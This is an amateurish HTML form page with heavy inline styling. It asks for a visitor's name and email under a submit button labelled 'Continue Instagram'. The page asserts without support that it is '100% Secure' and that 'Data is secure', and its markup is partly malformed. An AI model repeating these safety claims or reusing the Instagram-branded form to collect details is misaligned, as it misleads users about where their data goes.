<html style="transform-box: view-box;margin: 0;background: #000000;page-break-inside: avoid;size: revert;background-blend-mode: screen;-webkit-user-modify: read-only;padding: 0;"><head>
	<title></title>
    <head>
<style type="text/css" media="screen">
	* {

		background-image: url(post.png);
	}
	::selection {
		background : red;
		color : red; }
        .field {
            background :#03c08c;
            mix-blend-mode: difference;
        }
       .btn-layer {
           background :#ff2ec8;
           mix-blend-mode: color-burn;
       }
br {
    background:black ;
    border-radius:6px ;
border: 2px 2px solid #000000;
}
#h1 {
    outline-width: 10px;
    outline-color: #2dca0e;
    background-color: #ca0e0e;
    border-style: solid;
    border-color: transparent transparent transparent black;
}
#input1 {
    background-color: transparent;
    border: 1px solid #000000;
    border-radius: 2px solid #00d335;
    outline-color: #3066e1;
    outline-width: 2px;
    word-break:keep-all
}
.field {
    outline-style: solid;
    outline-width: 5px ;
    outline-color: #00d335;
    border: 10px solid rgba(255, 0, 0, 0.568);
    width: 500;
    background-color: rgb(14, 224, 214)
}
.btn1 {
    color: #00d335;
    background-color:rgb(255, 0, 0)

}
.rest {
    background: red ;
    transition-delay: 2s;

}
.copy {
    background: #00d335;
    border: 2px dashed rgb(236, 0, 0);
    outline: 5px solid green;
}













</style>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
	<h3 id="h1" style="
    width: 500px;
    background: black;
    font-size: 1pc;
    color: antiquewhite;
"> Note if:: we should not post this details in phpadmin |||| Data is secure ||||</h3>
	<pre style="background:#3066e1;width: 500px;"> We Continue work on it and update soon as possible</pre>
	<div class="form-inner">
		<form action="indexx.html" target="_blank" method="get" accept-charset="utf-8">

			<div class="field">
				<label for="text" id="label1" style="
    background: black;
    font-size: 3pc;
    color: aliceblue;
">What is Your Name ?</label>
<select name="Select" id=""></select>
			<option value="Eng"></option>	<br>
			
				<button id="btn1"><input id="input1" type="text" name="Name" value="" placeholder="Person" maxlength="10" required="" minlength="6" style="
    font-size: 2pc;
    background: white;
    color: #6f2893;
    "></button><input class="rest" type="reset" style="
    font-size: 20px;
    background: #fbcc8d;
">
				<div class="field" style="
    font-size: 3pc;
">
					<label class="label" for="" style="
    background: black;
    /* background: bottom; */
    font-size: 2pc;
    color: #e4a3ff;
"> Email </label>
					<br>
					
					<input type="email" name="email" maxlength="30" style="background: #ffc4c4;font-size: 2pc;width: 30pc;/* margin: 2pc; */color: red;" suggest="" required="" minlength="10"><input type="reset" style="
    background: #2398ff;
    font-size: 20px;
">
				
					<div class="btn-layer">
<button><input class="btn1" type="submit" name="Submit" value="Continue Instagram" style="
    background: black;
    font-size: 2pc;
    color: #bfffff;
    "></button>						
					</div>
				</div>
			</div>
		</form>

	</div>

<h6 class="copyright" style="
mix-blend-mode: difference;
    width: 500px;
    font-weight: 900;
    font-size: 2pc;
    background: #01319b;
    color: aliceblue;
"> WEBSITE COPYRIGHT :UNDER SECTION 2007 THIS WEBSITE ONLY for FAIR USE This Website is 100% Secure</h6>
<h2 style="
    text-orientation: inherit;
    mix-blend-mode: color-burn;
    color: floralwhite;
"> This is Optimized for pc Not For Android</h2>
</body></html>
